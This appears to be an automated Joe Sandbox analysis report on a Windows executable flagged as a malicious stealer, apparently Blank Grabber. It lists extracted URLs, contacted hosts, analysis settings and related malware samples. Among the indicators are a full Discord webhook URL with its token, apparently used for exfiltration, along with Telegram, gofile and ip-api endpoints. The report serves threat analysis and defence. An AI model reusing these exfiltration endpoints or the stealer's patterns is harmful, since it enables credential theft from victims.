              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=e45AiBoV6X.exe, 00000001.00000003.1833183214.000002290B14E000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://httpbin.org/e45AiBoV6X.exe, 00000001.00000003.1984164140.000002290AF88000.00000004.00000020.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0se45AiBoV6X.exe, 00000000.00000003.1719392220.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://canary.discord.com/api/webhooks/1248781366489907321/ufb6qyCKcRyE7syQfJqh1lNQR64inZBSWaeenuFVe45AiBoV6X.exe, 00000001.00000002.1987882294.000002290B4E0000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016e45AiBoV6X.exe, 00000001.00000003.1830286193.000002290B15C000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1829771493.000002290BB8B000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1880836585.000002290BB8B000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1986388661.000002290AF60000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.ecosia.org/newtab/e45AiBoV6X.exe, 00000001.00000003.1833183214.000002290B14E000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-bre45AiBoV6X.exe, 00000001.00000003.1764894979.000002290B065000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1766242664.000002290B164000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1764223855.000002290B164000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://github.com/Pester/Pesterpowershell.exe, 00000025.00000002.1843488107.000002968022A000.00000004.00000800.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://images-ext-1.discordapp.net/external/etSU0hGkd0ttMXA41AUjUl74oI1ajbez8WS2N-KLvK4/https/raw.ge45AiBoV6X.exe, 00000001.00000002.1987306791.000002290B039000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1982906328.000002290B033000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1986949781.000002290B00B000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1986903181.000002290AFF2000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1984419770.000002290AFF0000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1982906328.000002290B00B000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1983434642.000002290B038000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1983989604.000002290AFCF000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535e45AiBoV6X.exe, 00000001.00000002.1985975693.000002290AE6A000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sye45AiBoV6X.exe, 00000001.00000002.1984931538.000002290897F000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://MD8.mozilla.org/1/me45AiBoV6X.exe, 00000001.00000002.1988000626.000002290B698000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://cdn.discordapp.com/attachments/1248781326262468744/1264315028736180234/Blank-user.rar?ex=66e45AiBoV6X.exe, 00000001.00000003.1982906328.000002290B033000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1983434642.000002290B038000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://ip-api.com/line/?fields=hostingre45AiBoV6X.exe, 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://bugzilla.moe45AiBoV6X.exe, 00000001.00000003.1881191624.000002290B113000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://tools.ietf.org/html/rfc6125#section-6.4.3e45AiBoV6X.exe, 00000001.00000002.1987767316.000002290B3D0000.00000004.00001000.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://api.telegram.org/bot%s/%s)e45AiBoV6X.exe, 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
URL | Source | Malicious | Detection | Reputation
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000006.00000002.1872141468.0000021941BA8000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://google.com/mail | e45AiBoV6X.exe, 00000001.00000002.1986630728.000002290AF8B000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1984164140.000002290AF88000.00000004.00000020.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py | e45AiBoV6X.exe, 00000001.00000002.1984931538.000002290897F000.00000004.00000020.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://www.google.com/ | e45AiBoV6X.exe, 00000001.00000002.1988000626.000002290B698000.00000004.00001000.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://foss.heptapod.net/pypy/pypy/-/issues/3539 | e45AiBoV6X.exe, 00000001.00000002.1987655713.000002290B2D0000.00000004.00001000.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900. | e45AiBoV6X.exe, 00000001.00000002.1986388661.000002290AF7E000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1985975693.000002290ACD0000.00000004.00000020.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
http://google.com/ | e45AiBoV6X.exe, 00000001.00000002.1985469081.000002290AA69000.00000004.00000020.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://api.gofile.io/getServerr | e45AiBoV6X.exe, 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
http://ocsp.sectigo.com0 | e45AiBoV6X.exe, 00000000.00000003.1719392220.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.python.org/download/releases/2.3/mro/. | e45AiBoV6X.exe, 00000001.00000002.1985753646.000002290AAD0000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.dr | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000025.00000002.1862744633.000002969007C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://discordapp.com/api/v9/users/ | e45AiBoV6X.exe, 00000001.00000003.1739482392.000002290AE26000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1738014114.000002290AE01000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
http://ip-api.com/json/?fields=225545r | e45AiBoV6X.exe, 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | e45AiBoV6X.exe, 00000001.00000003.1833183214.000002290B14E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/urllib3/urllib3/issues/2920 | e45AiBoV6X.exe, 00000001.00000002.1987767316.000002290B3D0000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | e45AiBoV6X.exe, 00000001.00000003.1830286193.000002290B15C000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1829771493.000002290BB8B000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1880836585.000002290BB8B000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1986388661.000002290AF60000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | e45AiBoV6X.exe, 00000000.00000003.1719392220.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://yahoo.com/ | e45AiBoV6X.exe, 00000001.00000002.1986630728.000002290AF8B000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1984164140.000002290AF88000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://account.bellmedia.c | e45AiBoV6X.exe, 00000001.00000002.1988820175.000002290BF48000.00000004.00001000.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1982362710.000002290B8E8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6 | e45AiBoV6X.exe, 00000001.00000002.1985975693.000002290AE6A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://login.microsoftonline.com | e45AiBoV6X.exe, 00000001.00000002.1988000626.000002290B698000.00000004.00001000.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1988820175.000002290BF4C000.00000004.00001000.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1982362710.000002290B8E8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0 | e45AiBoV6X.exe, 00000000.00000003.1719392220.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1718378444.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://html.spec.whatwg.org/multipage/ | e45AiBoV6X.exe, 00000001.00000003.1785007830.000002290AEBB000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1986264729.000002290AEB5000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1764714930.000002290AEB7000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1881510721.000002290AEB4000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1983212942.000002290AEB4000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1835081648.000002290AEBB000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1789596748.000002290AEBB000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings | e45AiBoV6X.exe, 00000001.00000002.1987655713.000002290B2D0000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.zhihu.com/ | e45AiBoV6X.exe, 00000001.00000002.1988000626.000002290B698000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | e45AiBoV6X.exe, 00000001.00000003.1833183214.000002290B14E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.rfc-editor.org/rfc/rfc8259#section-8.1 | e45AiBoV6X.exe, 00000001.00000002.1986630728.000002290AF8B000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1984164140.000002290AF88000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000025.00000002.1862744633.000002969007C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://oneget.orgX | powershell.exe, 00000025.00000002.1843488107.0000029681606000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.microsoftISPLA~1.PNGy.L | e45AiBoV6X.exe, 00000001.00000002.1986774227.000002290AFCF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1983989604.000002290AFCF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.gofile.io/getServer | e45AiBoV6X.exe, 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png | e45AiBoV6X.exe, 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000006.00000002.1937080762.00000219519F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1843488107.0000029681972000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1862744633.00000296901BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1862744633.000002969007C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000025.00000002.1843488107.0000029681606000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://sectigo.com/CPS0 | e45AiBoV6X.exe, 00000000.00000003.1719392220.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | e45AiBoV6X.exe, 00000001.00000003.1833183214.000002290B14E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Blank-c/Blank-GrabberrV | e45AiBoV6X.exe, 00000001.00000003.1739482392.000002290AE26000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1738014114.000002290AE01000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.amazon.co.uk/ | e45AiBoV6X.exe, 00000001.00000002.1988000626.000002290B644000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.thawte.com0 | e45AiBoV6X.exe, 00000000.00000003.1719392220.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1718378444.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz | e45AiBoV6X.exe, 00000001.00000003.1739482392.000002290AE26000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1738014114.000002290AE01000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.comod | e45AiBoV6X.exe, 00000001.00000003.1761395137.000002290B00C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.python.org/dev/peps/pep-0205/ | e45AiBoV6X.exe, 00000000.00000003.1717679887.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1736201846.000002290AA3D000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1737797560.000002290AA3D000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1736689465.000002290AA40000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1737369965.000002290AA3D000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1725631506.000002290AA3D000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.wykop.pl/ | e45AiBoV6X.exe, 00000001.00000002.1988000626.000002290B644000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://twitter.com/ | e45AiBoV6X.exe, 00000001.00000002.1986630728.000002290AF8B000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1985975693.000002290ACD0000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1984164140.000002290AF88000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.olx.pl/ | e45AiBoV6X.exe, 00000001.00000002.1988000626.000002290B698000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://support.mozilla.org/products/firefox | e45AiBoV6X.exe, 00000001.00000003.1764894979.000002290B065000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://google.com/ | e45AiBoV6X.exe, 00000001.00000003.1984164140.000002290AF88000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://google.com/mail/ | e45AiBoV6X.exe, 00000001.00000002.1985469081.000002290AA69000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | e45AiBoV6X.exe, 00000001.00000003.1833183214.000002290B14E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://google.com/mail/ | e45AiBoV6X.exe, 00000001.00000002.1985975693.000002290AE6A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
162.159.137.232 | canary.discord.com | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1477272
Start date and time: 2024-07-20 22:15:09 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 14s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 88
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: e45AiBoV6X.exe (renamed because the original name is a hash value)
Original Sample Name: 3e6d7972822636f67ccf275ebd140188.exe
Detection: MAL
Classification: mal100.rans.troj.spyw.expl.evad.winEXE@135/52@2/2
EGA Information:
• Successful, ratio: 60%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 116
• Number of non-executed functions: 207
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 142.250.185.195, 13.85.23.86, 20.166.126.56, 13.95.31.18
• Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, gstatic.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 1368 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7544 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtQueryVolumeInformationFile calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
16:16:10 | API Interceptor | 123x Sleep call for process: powershell.exe modified
16:16:11 | API Interceptor | 5x Sleep call for process: WMIC.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | iA8m9FfF5v.exe | malicious | DCRat | ip-api.com/line/?fields=hosting
208.95.112.1 | R6UcgOy5nE.rtf | malicious | AgentTesla, PureLog Stealer | ip-api.com/line/?fields=hosting
208.95.112.1 | PR240614_ORDER.exe | malicious | PXRECVOWEIWOEI Stealer | ip-api.com/line/?fields=hosting
208.95.112.1 | IEnetcache.hta | malicious | Cobalt Strike, AgentTesla, PureLog Stealer | ip-api.com/line/?fields=hosting
208.95.112.1 | winiti.exe | malicious | AgentTesla, PureLog Stealer | ip-api.com/line/?fields=hosting
208.95.112.1 | payment_application.xls | malicious | AgentTesla, PureLog Stealer | ip-api.com/line/?fields=hosting
208.95.112.1 | 0RA0ngi2c2.exe | malicious | AgentTesla, PureLog Stealer | ip-api.com/line/?fields=hosting
208.95.112.1 | Payment swift copy103988.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | Enquiry-Dubai.js | malicious | PXRECVOWEIWOEI Stealer | ip-api.com/line/?fields=hosting
208.95.112.1 | 172131942401ffa05fff4c7d2b222e93d44117cc2a702a757a1aa7c5c6fc9cfeeacb380f89693.dat-decoded.exe | malicious | PXRECVOWEIWOEI Stealer | ip-api.com/line/?fields=hosting
162.159.137.232 | http://mj-api.kun-ai.com/ | malicious | Unknown | (none)
162.159.137.232 | 0x000700000001ac52-36.exe | malicious | Python Stealer, Empyrean, Discord Token Stealer | (none)
162.159.137.232 | http://huoqu.26335442079873.workers.dev/ | malicious | Unknown | (none)
162.159.137.232 | Exter.exe | malicious | Exela Stealer, Python Stealer | (none)
162.159.137.232 | golang-modules.exe | malicious | Unknown | (none)
162.159.137.232 | setup.exe | malicious | Blank Grabber, Njrat, Umbral Stealer, XWorm | (none)
162.159.137.232 | SecuriteInfo.com.Trojan.Win64.Agent.14415.19839.exe | malicious | Unknown | (none)
162.159.137.232 | https://prohubth.com/ | malicious | Unknown | (none)
162.159.137.232 | node.js.exe | malicious | Unknown | (none)
162.159.137.232 | msupdate.exe | malicious | Unknown | (none)
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ip-api.com | iA8m9FfF5v.exe | malicious | DCRat | 208.95.112.1
ip-api.com | R6UcgOy5nE.rtf | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
ip-api.com | PR240614_ORDER.exe | malicious | PXRECVOWEIWOEI Stealer | 208.95.112.1
ip-api.com | IEnetcache.hta | malicious | Cobalt Strike, AgentTesla, PureLog Stealer | 208.95.112.1
ip-api.com | winiti.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
ip-api.com | payment_application.xls | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
ip-api.com | 0RA0ngi2c2.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
ip-api.com | Payment swift copy103988.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | Enquiry-Dubai.js | malicious | PXRECVOWEIWOEI Stealer | 208.95.112.1
ip-api.com | 172131942401ffa05fff4c7d2b222e93d44117cc2a702a757a1aa7c5c6fc9cfeeacb380f89693.dat-decoded.exe | malicious | PXRECVOWEIWOEI Stealer | 208.95.112.1
canary.discord.com | Built (1).exe | malicious | Blank Grabber | 162.159.128.233
canary.discord.com | GalacticShooter (3).exe | malicious | Unknown | 162.159.136.232
canary.discord.com | GalacticShooter (3).exe | malicious | Unknown | 162.159.128.233
canary.discord.com | 322pVOVprx.exe | malicious | Creal Stealer | 162.159.128.233
canary.discord.com | S3zoj9Uts0.exe | malicious | Unknown | 162.159.138.232
canary.discord.com | uBZeAVcb6r.exe | malicious | Unknown | 162.159.137.232
canary.discord.com | 12057ad2.exe | malicious | NitroRansomware | 162.159.138.232
canary.discord.com | build (2).exe | malicious | Stealerium | 162.159.136.232
canary.discord.com | Evo_Spoofer_V2.exe | malicious | Hog Grabber | 162.159.135.232
canary.discord.com | qgMcnt4meR.exe | malicious | Unknown | 162.159.128.233
bg.microsoft.map.fastly.net | Chrome.msi | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | WindowsProgram.msi | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | P.exe | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | nKMY2cYqFR.exe | malicious | RedLine | 199.232.214.172
bg.microsoft.map.fastly.net | file.exe | malicious | Vidar | 199.232.210.172
bg.microsoft.map.fastly.net | echo-12DRSO-LQdNuUix.exe | malicious | Quasar | 199.232.210.172
bg.microsoft.map.fastly.net | setup.exe | malicious | Tofsee | 199.232.210.172
bg.microsoft.map.fastly.net | 9YDEsXvk5V.exe | malicious | Vidar | 199.232.210.172
bg.microsoft.map.fastly.net | release_resources.img | malicious | LummaC | 199.232.214.172
bg.microsoft.map.fastly.net | https://uitp5vcr.paperform.co/ | malicious | Unknown | 199.232.214.172
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | http://becast.onionlive.workers.dev | malicious | Unknown | 172.67.141.108
CLOUDFLARENETUS | SecuriteInfo.com.Riskware.OfferCore.702.11507.exe | malicious | PrivateLoader, PureLog Stealer | 104.18.21.226
CLOUDFLARENETUS | SetupApp_17.5.exe | malicious | Unknown | 104.26.13.171
CLOUDFLARENETUS | file.exe | malicious | Amadey, Babadeda, Stealc, Vidar | 172.64.41.3
CLOUDFLARENETUS | Flyingl Updated Handbook.docx | malicious | Unknown | 188.114.96.3
CLOUDFLARENETUS | Flyingl Updated Handbook.docx | malicious | Unknown | 188.114.97.3
CLOUDFLARENETUS | git.software.v1.1.5.exe | malicious | LummaC | 104.21.12.83
CLOUDFLARENETUS | file.exe | malicious | Amadey, Babadeda, Stealc, Vidar | 172.64.41.3
CLOUDFLARENETUS | K_5194577-5935GS.exe | malicious | Unknown | 172.67.202.188
CLOUDFLARENETUS | IN-7948-55902MXH.exe | malicious | Unknown | 172.67.170.126
TUT-ASUS | iA8m9FfF5v.exe | malicious | DCRat | 208.95.112.1
TUT-ASUS | R6UcgOy5nE.rtf | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
TUT-ASUS | PR240614_ORDER.exe | malicious | PXRECVOWEIWOEI Stealer | 208.95.112.1
TUT-ASUS | Roblox Account Manager.exe | malicious | Unknown | 208.95.112.1
TUT-ASUS | Roblox Account Manager.exe | malicious | Unknown | 208.95.112.1
TUT-ASUS | IEnetcache.hta | malicious | Cobalt Strike, AgentTesla, PureLog Stealer | 208.95.112.1
TUT-ASUS | winiti.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
TUT-ASUS | payment_application.xls | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
TUT-ASUS | 0RA0ngi2c2.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
TUT-ASUS | Payment swift copy103988.exe | malicious | AgentTesla | 208.95.112.1
                                  No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Local\Temp\_MEI73802\VCRUNTIME140.dll | J263jrmRm4.exe | malicious | Unknown | (none)
C:\Users\user\AppData\Local\Temp\_MEI73802\VCRUNTIME140.dll | 00#U2800.exe | malicious | Python Stealer | (none)
C:\Users\user\AppData\Local\Temp\_MEI73802\VCRUNTIME140.dll | SecuriteInfo.com.Python.ClipBanker.31.2455.3742.exe | malicious | Unknown | (none)
C:\Users\user\AppData\Local\Temp\_MEI73802\VCRUNTIME140.dll | update23.bat | malicious | Braodo | (none)
C:\Users\user\AppData\Local\Temp\_MEI73802\VCRUNTIME140.dll | SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe | malicious | Unknown | (none)
